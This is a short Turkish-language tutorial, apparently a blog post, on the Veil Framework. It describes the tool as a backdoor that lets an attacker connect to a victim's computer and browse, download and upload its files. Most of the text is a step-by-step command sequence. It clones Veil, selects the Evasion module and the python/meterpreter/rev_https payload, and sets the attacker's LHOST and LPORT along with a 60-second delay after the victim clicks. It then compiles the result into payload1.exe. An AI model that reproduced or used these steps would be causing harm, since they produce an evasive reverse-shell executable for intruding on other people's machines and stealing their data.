Herkese merhaba. Bu yazımda “Veil Framework nedir, nasıl kullanılır, işlevleri nelerdir?” bunlardan bahsedeceğim.
Veil-Framework Nedir?
Veil Framework işlevsel bir backdoor aracıdır. Kısaca değinmek gerekir ise, saldırı altındaki bilgisayar saldırganın bilgisayarı ile iletişime geçer ve saldırı altındaki bilgisayar saldırganın bilgisayarına bağlanır. Adından da anlaşıldığı gibi arka kapıyı açık bırakır. Yani siz istediğiniz zaman saldırı altındaki bilgisayar ile sorunsuz bir şekilde bağlantı kurabilirsiniz.
Özellikleri
- Pek fazla bir özelliği yoktur aslında. Sade ve öz bir konsol (Terminal) uygulamasıdır.
- İstediğiniz zaman; kurbanın bilgisayarına bağlanabilir,
- Bütün dosyalarında dolaşabilir,
- Dosyalarını bilgisayarınıza indirebilir,
- İstediğiniz dosyayı bilgisayarına yükleyebilirsin
sudo su
cd /(indirmek istediğiniz dizin)
git clone https://github.com/Veil-Framework/Veil
Git Clone ile Veil Framework’ u indirdikten sonra aşağıdaki kodları sırası ile uygulayalım.
Kod:
# cd /kayitliolduguklasör/Veil # ./config/setup.sh --force --silent # Python Veil.py # use 1 (Evasion) # list (Buradan istediğimiz backdoor' u seçiyoruz.) # use 27 (Biz python/meterpreter/rev_https.py' i seçtik.) (Şimdi ise gerekli ayarlamaları yapacağız. Hepsinden bahsedemem çok geniş ve her backdoor' da farklı özellikler mevcut. Bunları kurcalayarak bulabilirsiniz.) # set LHOST 192.168.2.1 (Sizin IP adresiniz ne ise onu girin.) # set LPORT 8000 (Karşı bilgisayarın bizimle hangi port üzerinden iletişim kuracağını seçiyoruz.) # set SLEEP 60 (Backdoor' umuz kurban exe dosyasına tıkladıktan 60 saniye sonra aktif olacak.) # generate (Bütün ayarlamaları yaptıktan sonra generate diyerek Payload' umuzu oluşturuyoruz.) # payload1 (Payload' ımızın adını istediğimiz gibi giriyoruz.) # 1 (PyInstaller ile Payload' ın kurulumunu gerçekleştiriyoruz.) 4. resimde gözüktüğü üzere bize kayıtlı olduğu yeri söylüyor. (Executable written to: /var/lib/veil/output/compiled/payload1.exe )